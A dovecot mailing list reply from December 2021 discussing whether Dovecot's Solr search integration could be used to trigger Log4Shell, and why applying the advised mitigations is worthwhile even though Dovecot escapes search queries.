Can dovecot be leveraged to exploit Solr/Log4shell?
John Fawcett
john at voipsupport.it
Wed Dec 15 18:16:55 UTC 2021
On 15/12/2021 08:52, Aki Tuomi wrote:
> The suggested configuration is good, and although we did some checking to ensure that dovecot escapes the search queries and usernames sent to solr, so it is not trivial to send the JNDI expansion strings to be logged by solr, it is still good idea to set this.
>
> Aki
>
Agreed, it is worthwhile taking the advised mitigation steps regardless
of the escaping done in Dovecot. Reasoning is
1) escaping may not be 100% foolproof - there are people out there
working on bypassing such things
2) the search string method is not the only attack vector for SOLR. If
people have SOLR exposed on an internet host, even if password
protected, it doesn't mean to say that SOLR is not logging failed access
attempts that can easily contain the attack string.
John
More information about the dovecot
mailing list